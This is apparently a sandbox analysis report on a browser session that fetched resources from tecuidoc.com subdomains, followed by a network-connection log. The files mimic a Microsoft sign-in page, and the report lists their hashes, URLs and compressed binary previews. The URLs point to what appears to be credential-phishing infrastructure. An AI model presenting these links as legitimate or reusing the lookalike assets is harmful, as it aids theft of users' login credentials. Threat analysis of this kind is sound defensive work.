                                              Preview:...........Vk..F..._.V.f..y-kv6..V!j.....f.k...X3.I......l..!...3.\...&F.....=._...b/..w....v*qR+....L.....=.z...b..R......1...9".Af.".S.ngT....k...........-<.L..d..).a?(.m..R....v.._.{G.K.......y.....[.....^..y..-I...N....8......1...Z...n.r8..r..p.U+.?j.E)GDY!bl...]./Og...=<$..n...j......t.[z.OG..:.....pH.......(r.......|.2....}.....).|......]"..*.T)|}..hGS.v.`..jM:.<.p.h.*2.u*.I.\u"B.ay..4j.\vZ...j.FK.$\F:.r.......0.V....9B)..w.j.O...Hq...bY......=>B..4..I..e..V..J..[.3l."..VxL.{t@.Ra.T......~&.uUB....~....1..i.d.h..-_w:.Qg.k...Z.....RX.|..6k27g...1..t..y.(..V+...........V.>..z.@..g......;D......>.d?...3+....9..Z.X....*-~.....-1kQ.P..Z.X..h.....)..#..N..O.S..v..`.S.k#.R..@..p.:...........i}U/x....p2y..J..t..>...K...D.dSm..w..4k....../\....E..N...z[h...3.>.'QIi...8...^....c{0U..1.Y0.K..(....z.Z"....5..0.T.9>|.iU.D:.....C....U.-Uh..6vRW.Y.2..z.V.../u..H{..H...YuI.....G.M.=.PT....}.......i....%[.C..0*X.3O*..q....U*&7)....N..l.M|..N...}..bV
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 209667
                                              Category:downloaded
                                              Size (bytes):53541
                                              Entropy (8bit):7.9960457117846255
                                              Encrypted:true
                                              SSDEEP:768:sy9MlLUenoA8wlLj5JWZygRLgwV08gOINdBo4Okdg1dywg0t9pPgpk0lXG:1MlLUXAlj5HgJzV088Tezc4rgpkB
                                              MD5:0F5F95CB7CCA51EC97EB139955B0E1F7
                                              SHA1:FC1B057734566559DFAD368522DADA62FBD78F5D
                                              SHA-256:027726537DFB21480F6FEB81A067D7872B751F25A305065AFAFD6E3BE6D4254C
                                              SHA-512:804D2E32FF0F44D991C64A2A3502CF5FD0F4B7F376E6568C1978DF14C6D9CD66041D6C0BB35780EE3377196382593F49FA4CC9CF4B748DB813FB4EB67D75F872
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/lightweightsignuppackage_9itStK--DdHYjkMJSN7X3A2.js?v=1
                                              Preview:...........}y.......2...H.D...%i.ln.4m]5..).5E.$..g.3...7..i...{='...X...0....(v........XwX.|f.wWVX...a?.v..T.[q.:.v.#+rt....6.N.?#K.c._x.i:.%......._..U`.Z.Kk...[.............]V.UQ.[.....y....Y..ruUT._..[..~.........`.~].....`..'~L@..M..8.,p"+_.z...S.@.V.;.Y.dA......e....r.-|....ck....kARM.e."...+.^..\...4..F....H}....8t....<S.7c..\..$..,d......bf.E/..X.u....0.Yf..[.....C.O+..f.....O.. .En....P&...A.a.....z..M..(....!+..v.O..\c.....S.K...V:..u'[.J.ca.)...c......>.p...<.7..............o..|..oq.o..Z.n.oi'..>f...(K.....?K.s..i*.#D....r2s....S..C..Q...N._..D....w*..w.]....{.[.+.6T&.....5=....!8.z.......7..zwo..p.....<....6.....{..n............z}.....(..5z{].q.....G.F......i,....i..f.....>....7.8..sd.e...]w.....b..,.>.C.V..X".v2...FlZ.mh..m..0..s......>{.......cA...g;.'....m1,@..U6.F_.3.=.f8..........Z.....zY.'l..i......dU:-....;`.}....n....8.V....P....3.....M?....99..._..%..L+.1..)8..~."....?.Q,9|...s...!xs..P..p........$..Q....\..>8.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 3651
                                              Category:downloaded
                                              Size (bytes):1435
                                              Entropy (8bit):7.860223690068481
                                              Encrypted:false
                                              SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                              MD5:DF6A7721C242813411CC6950DF40F9B3
                                              SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                              SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                              SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 113084
                                              Category:downloaded
                                              Size (bytes):20314
                                              Entropy (8bit):7.979532931860973
                                              Encrypted:false
                                              SSDEEP:384:VkqQ8rNFEhCgMyL2iww6oIR8mWG+Pu9Z5IM6mxqrghTvUty7T9Q:gCGEiL/w7R8DW9Z5B6AasTv37T9Q
                                              MD5:7B082644CE5A069FB55F47B1A6B667F2
                                              SHA1:6A5FFA5369BF15FA42446C6EDE88E9E40A40E0E9
                                              SHA-256:8E34884C24973C66D83BAFDEC9445F746BEFEE773A384B340CA24C7B7703AF3A
                                              SHA-512:778CC9EA8646B747C02A1BFC68F7CB973A721328B180211657B2FEC2E5487500E8BD4D5A110C3C7C09C8BA66FE28BD47043C200227040B0B544941425473173A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css
                                              Preview:...........}ks.6.....\.R;.J.H=-WR;..&>g^53.G.R[.DY<C..$e.WG..... )...{+'g...l............bw_f7.:x..<x.-.*V5)/wE..Y...gy.0.*(.*-o.e.|..._..I.....?<{.!x...W..._..^..p..E..'..Y...<.....*]..6(. ..D..*...Y.......:.ve.?..!..|t...].+.......a.......|.P...u.H.d.d.r.c[..~.L..n.-.}e.H3...r..^..iP.u.*.z.....)..Z.jx..C'......u..{.C...N.o.m~..F(b..f.....h..O.....6....kr.......n2m M$.R..R..i{.~...*..n.dKY..#.Kn.4..G...O..l.#.a=..iU..].S.2.wY..O.|...Z.A....].uU.._%U.<...pp..u=.....C.R..S.....0...A<......&...W..'o.T.."..jO..^+.....DiW.b..7i..7..........lKe.0.~B0.....zQu#...YB.,.{*.&.6..G.6..._...J.i.?.LS$( .^.{..u.-.0....K....M&j..s.yB..+....^.)...7e.....]..eFI_.kRX.B......D[.4......+.u=>....R.`QEK...R..d...*S.. ,c5RKBK(......][..eF{T.....6...".....Uk:..S.0Ro.}B.dwJZ}U..S.F.....&.&.~|......{..Ep.>x..._....}p..=.}...v...7?}...g..1&.......}...^...o.x.>x...../.^....._.........w.v./.........BA...{J..w..$?.}w....?zO.r..5...7.gl..z...g.?.{....R.......yGj
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:downloaded
                                              Size (bytes):1864
                                              Entropy (8bit):5.222032823730197
                                              Encrypted:false
                                              SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                              Malicious:false
                                              Reputation:low
                                              URL:https://signup.tecuidoc.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 95910
                                              Category:downloaded
                                              Size (bytes):17755
                                              Entropy (8bit):7.985790080488064
                                              Encrypted:false
                                              SSDEEP:384:0P/snh9IWQT5yz/+u+ZoU9a5pXAeTHNxDyG6d1zC9pvFe5:K/HWWyqu+ZoU9atAeTHzeGgv5
                                              MD5:20BB3E61CB480004C030941EDFF4AD81
                                              SHA1:BB0CDA7D4E63EA8345019A7F302AADAD3A026FD1
                                              SHA-256:02724FBDC57E4EB4A124B817251CECEE00969B202319C285B4D2A697317D272E
                                              SHA-512:4DB78FDEC6FBDB197AC383542D2EDB20B29AF0AD84FDD4E7B20BB4D85B7825D9CBF5FFA40297B0E5D14AC401352C0617D27DC982CF46B3C13850F3384A0A49A5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1
                                              Preview:...........}is.F..w...\.XY..-J.....Y.*K..V.."!.k.`..e.....s_=.(...D.D...\===3}|......H..U...~.&..y._U.^.."..<..gi.P.2(.2.>..0......n....g./.w?...N..........N_....<zt.H..*I...^Fe<..,. .f..q.,.w.DipU..Z........iRVP.2N..).+..YTT....~.\.l..M2(=...U2..(.Sl)|..8Xg..n..l.._.....)(.nV...".....Z.v..9..XKZ.......O...^...%..h.j..&e.,...FHd..f..*.n.5o..O.].0n..C..:h.|=.B......@!9...N..A.y..ez.\.QF.\T...].q..........A.\ACh.:A\V.j..dn)........Z.TusYv/.*."Zu.,...p......G...^..9.=./...i.q...z.apq.T0...4.=zt...%...{...R.l..<....f....;d~..6X.EI..e.%...R.#...@f....7.v>K"2Q.|.&.Cg..6..B.{...>.d.G.$.."..h."_S.d.f.Vg...6..4Y&..R.Q.#@.......`..+.7..Z./a..:.<!./..$.$..f...; .2N.G.!!...h].-.....$)7..*dO.........0d.F.JH....SX.k.<.'.G.....2.....L.J.*.*.d1].|...${D.Dw.R}Y........gw3.._....~........<8{.._./O^.{....^'....../..x..-pc`....'........g.O..w....9{}z.i.o_........P..w......^..H.....9A.....W.........<....-.....3................@./....?..ZN.....VH.N.._..W.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 141279
                                              Category:downloaded
                                              Size (bytes):49636
                                              Entropy (8bit):7.9952631230497095
                                              Encrypted:true
                                              SSDEEP:768:WgrsQw4UHz9uoEydEJd4AdJr2nJ2qUoqqII/783H9xDIRKbtVI9Z2c6MF7Jx6RFn:WdQQHz99ne4AdpEIIkFk8or6Mf43ES
                                              MD5:624BC11EF09889CF4035C232001BBE1B
                                              SHA1:529BE185844320C4A31629AEABA092611BCCF106
                                              SHA-256:917102BD1C2F720533528BA5D02058772006AB277DA01DC1E61B00ED8995FB48
                                              SHA-512:E935CF3B1B850F49A08A0D7E86C333A1F830AAB0D1F0C8173490633FCCC730F6DA0F99743AAF993C997D50238BBAD1B3B36F5181FE84FBD6CE014C69E237BB98
                                              Malicious:false
                                              Reputation:low
                                              URL:https://eccd3fea-7d4f53f3.tecuidoc.com/shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js
                                              Preview:............[.8.8...+.w..O...hp../.t73@..sY`y.X.O.;k;\.r..S.......<..K...,..JU........~..}.?..y....T;.rx._;..?j'......?.....Im.LD....D..(.Eq-.GQ<.b/.I..~.....qt_K.Dm.G..Q..&A.B...D..:T...S/N.k.......-..B(=....|...(.F..>.6..0..Y..x...j..(..h..b1...|$.Az..V.E-.im........R..g....C....*.SG..:.D....:.e.p.lk..*....PK..s4.......5..}B....:h.?..v........I-..F.J..5.4..d.\....Q.>.....B.0..y....k....B=.j"I..TLpl... ..".Z..$....I..n....k..Ywi:M.... ....T.f....Qt..G...@.F_....O......<b.9.....R.. T.=..0..j..0...o0.1......M.O.W.p.....E=..z.oQ\..`......ymy.um%n......}`ODx..u.F...2...Cd... .......J........#+6WW...zuufOg.]._.+...n...H..k..]UzV.U..ez.z.cR.....t.;S-5gvr...Y7.......w3,...`\./.k3..,.k.l...C&]*.b...8.5qVZ..t^..,$..51Ue.....^&.J3O......<.B......8.....y.ZR..G.zc.wc.E.hL|f.w1H.P<..!. ..w.:kk..^.r5..I.D .j....S.....p".........v...X-.0..q..c;....0*..*........t:y..VV7..L.....z....].u....paJ^.(J..-f....!.......j.}'<.-...f.."=..lK>>.{.'....d..nZ.3..H.Lx.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 22961
                                              Category:downloaded
                                              Size (bytes):5564
                                              Entropy (8bit):7.969084579738236
                                              Encrypted:false
                                              SSDEEP:96:z6I4XZXVk41B1hFdJqnP/x0rTuwfifl0h3yajulA2TxxBM0iUGR+MrBN6Fz+w:z6Zlpvv7J6P/TwfifK5yb9vM0iUGdrnY
                                              MD5:4501B830B91D1E2579FFA5E4AE7DBF8E
                                              SHA1:98DC93FD4202A891E8F3BBAF7C66A34C975F99FC
                                              SHA-256:6D4FCBE3D08C3A13F4BCBD056FE459C62FC6D67ADC206E15EE25C87F4EF6E91D
                                              SHA-512:7202A274B5C14411458F8553204B803C1782E6E0912935DCAF24A9A1FBE4D05DF27D98FC6AF9167F3AD23E71764F72409F49D9E269230577CBE267560A0F26FE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
                                              Preview:...........<k..8...+.....pg..`.bd3...f..6..;.F...&2...4...W.DR...d..[.EV...".{..9.g_....B.y).%<$..itOF#2._..M!..b..".K..g.>.../..BG9...r#........Q.k......;g...J.Z..|..].I."HSq..)Et.e../0...;....6."...Y.N.<%c.C.Iy...B..&)_....K.y.H....bN.......UUQE.. .7,_.M.4.....V...s"...A.fF.......6O..yV..2...*.A./..57..)...j...EJ....*= ..j........X..&+/o)..pq.d....;..Qv./..........1. j..)#f"%S.B.x...F.H.1$..WQ|.l.x.T.......5.%}.......2%@D...D@..*A&)...u.$et...M.........<U0O..8.Y.C2?_.x.?...t..U..;.YD.P...zN...X.,-...A..().2..Y.M..E....J..K....S...W.> (a.e.`.j..A.......m..%e..l.Al.O.....-..~..$.D.d.....}..^.s.J...V...Q,....&/V.%..!.?.bOj.3..-3d0.......*....;....5.=.T-.5LF.- j...-d\....."..hD.K...D...q... ....K$..'jU.....h2Lk..!.wk....$...,...;..p.G<j..U.mq..s..`........K..f......88o..kp.M7z@.kZ...W#a....Jn..7.7..WW.)..A.,q."..|.@........=s..3..1.D.Z.-=U.l..Ll.r,6..6;..I... .".[..9...5.B#..V.....6.<..F=.A.x./7.P.6%....V.6.Ab.}4.O;.....e&........ACU.\
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 223826
                                              Category:downloaded
                                              Size (bytes):54365
                                              Entropy (8bit):7.995036403521762
                                              Encrypted:true
                                              SSDEEP:1536:g+j5lxlBXeoP7ctL94CozlMoC7SWtW/f6AnRtD9i0aaV2:tFlxltQLRKwE6ARtDbv2
                                              MD5:7507B82DFAFBD7B27580DDE69308FF0D
                                              SHA1:0C482A1BAF03A5F7365CD7FC699A1D23B76259C7
                                              SHA-256:4A1D5A23D3C865CD783D71FEFF4D312F415BBDD8DBB3EA846357993DF34E8F5F
                                              SHA-512:411E41727DDDC41D65240F4E68167F8B738485BDD168532A142E71487E404A1C15FDBEE1DEE4063B5AD6D52F54F1E9F31104EC3C1F480CC934BC31F09EACBD37
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_7f0a8c2a247460fad87f.js
                                              Preview:...........k{.F.0.}...gF.L."..eR..v.y.O....g...............~...@....f<...F./...u...;............x.y.C...y...sx.....^=}.....N.W.I.Y$.....".w....$..|..a...+.7O.eg.gW..2...8*..2)J..<^f.:.4..;....<}.....ZK.......5..,;iV&Q...9......;U:....$....DyVd....Q...N......N..".;.,//.8...X..ZP7......&shpA...a.I.C\U0i.&K..}m..1..9.N.u....^.'I/:......r...a^Ee.f..oq..e'..y..U..;...T(...<L..;X.."..8-}.^L.._w.....f.w..V.x.kK..K../.A..[....oE....G..ao0...\........e.U.<..Qv.7..eX...70.....|.s.}.#...:..t...$..>.....2<.e..?...A....>...9....]..a[...Wa..?.T..R.^....*.....s8:./.4.Y.._..w.6.;i..#.....M......s..!.ypt.........<... .,s.SO*X.._....E.t>...?.....uU..C.<.......2...b...:..$..*..V.>.._,......z..L....{......\o.K..].p].V....0.)..".....2..i..z.......G..y....^z.._....../..8...~|..~.#^<..t.kb......_...cK..<I.n...>.=...@..8wC.`..y......L.W.x...........2.E..y...c....E?)~....l....-..m.'......... .g....2vo..z.O2..q..5w...o[.....4).nI.....7.f..66t...l.g.l&6Z.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 10141
                                              Category:downloaded
                                              Size (bytes):4374
                                              Entropy (8bit):7.957505627255931
                                              Encrypted:false
                                              SSDEEP:96:6DTXgGV36e6zsgzjPPUCm5U3+UwFDvJOSpLYlR0SWn2d2P:6rV360lAOtvJOnrLWnU2P
                                              MD5:BF39C8BB7CB5792B87CE7234E57F3F58
                                              SHA1:1F1F4C9378B08AD6A5E906732DFB6B9BBFCA2855
                                              SHA-256:AFDC8CCFDB872D84CF0699DF85F681AFF90AD94AB7FFD17F9256E898FBF55200
                                              SHA-512:46B433BA2CF4E08688C211E125E0CD426EE58CE1801B99DFA847C5B0F7135A44EE249B38C99215BE7BEA07E3B9986CB5AF85AA604C93130B457BCB1810DB598C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/watson_DOaS_v-h3FCKtNPQv8zSLw2.js?v=1
                                              Preview:...........Z.W.H....B....](fzz.=;.....fK I.c|8.T.E..h1......*m6.L.9. .r..].{..q.yi."..4wcK.. .....t^..Q6..=..h.LxJ....&*Z{Y..V\.....n.].{...f...0...n?e2^0^;.x....b T.K..,V..T.\2.e...;..0o....-..$..;.\n.6W.).-.O..~.."?.u9m;O{|.._...#.%6.yI.g^.b'U.i.D...,......e4I.o.z.`o.al...6.V+..c.9.-y.#.J..7. F[..:Q.2>t.IG.Ul...hw.7q~L7m........2.....j..d....s,j...f..%.n....(....1.m.!p..........q..0...nw..*2>.1..<g.K..U...F..XI..n:..d0.7.......m#.o.m...:..sc..t.hs....r<...Tj.Vq.}.uF.I^M.5RY.[..57...R..L.s..V.\_...s..e9^.^<.D[#....I.3..F........`.(..<..>...Ve..iE..M:Z.0..N............c.<n..kE...eK..N...O,.&..G.:.37.$..sV..:..._&...S....$..b1..x...........5...Y.L...u.`.l...W.g...q.r....!$......7.g8m.9G.%F.l.R ..s..O..}/......+...]...7..W+.&..l..]..;.$.b."*.V.5.C....I(.8.....a.......0....mw.!".f(.<..].{....}...j .q4w..?..T.v..C....7g....)!.zXA..\....^e.....x..3.v2....**l*.I.l....VkU.Z.sk<...SBA...RH...v.e..(.?...%...g.ij...!.nU..+.B%~.......H.o..n.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:GIF image data, version 89a, 352 x 3
                                              Category:dropped
                                              Size (bytes):3620
                                              Entropy (8bit):6.867828878374734
                                              Encrypted:false
                                              SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                              MD5:B540A8E518037192E32C4FE58BF2DBAB
                                              SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                              SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                              SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                              Malicious:false
                                              Reputation:low
                                              Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 1864
                                              Category:downloaded
                                              Size (bytes):673
                                              Entropy (8bit):7.6584200238076905
                                              Encrypted:false
                                              SSDEEP:12:XRt8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:X+UVpkNK0Rwid81p6btk7LqZ6D
                                              MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                              SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                              SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                              SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                              No static file info
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 26, 2024 16:56:05.152561903 CEST49673443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:05.152575016 CEST49674443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:05.480726957 CEST49672443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:10.954015017 CEST44349698173.222.162.64192.168.2.6
                                              Apr 26, 2024 16:56:10.954118013 CEST49698443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:14.853919983 CEST49674443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:14.916429043 CEST49673443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:15.232613087 CEST49672443192.168.2.6173.222.162.64
                                              Apr 26, 2024 16:56:15.647206068 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.647284985 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.647418022 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.648185015 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.648226023 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.648292065 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.648458958 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.648487091 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.648612022 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.648626089 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.977344036 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.983324051 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.986218929 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.986248016 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.986465931 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.986496925 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.987478971 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.987566948 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.987823009 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.987886906 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.990463972 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.990535021 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.991473913 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.991486073 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:15.992186069 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:15.992422104 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:16.057301044 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:16.057358027 CEST44349706198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:16.166217089 CEST49706443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:16.196156979 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:16.196237087 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:17.515630007 CEST49708443192.168.2.6142.250.217.196
                                              Apr 26, 2024 16:56:17.515676975 CEST44349708142.250.217.196192.168.2.6
                                              Apr 26, 2024 16:56:17.515779018 CEST49708443192.168.2.6142.250.217.196
                                              Apr 26, 2024 16:56:17.516093016 CEST49708443192.168.2.6142.250.217.196
                                              Apr 26, 2024 16:56:17.516118050 CEST44349708142.250.217.196192.168.2.6
                                              Apr 26, 2024 16:56:17.840909004 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:17.840943098 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:17.840961933 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:17.841089010 CEST49707443192.168.2.6198.58.99.33
                                              Apr 26, 2024 16:56:17.841123104 CEST44349707198.58.99.33192.168.2.6
                                              Apr 26, 2024 16:56:17.841178894 CEST49707443192.168.2.6198.58.99.33
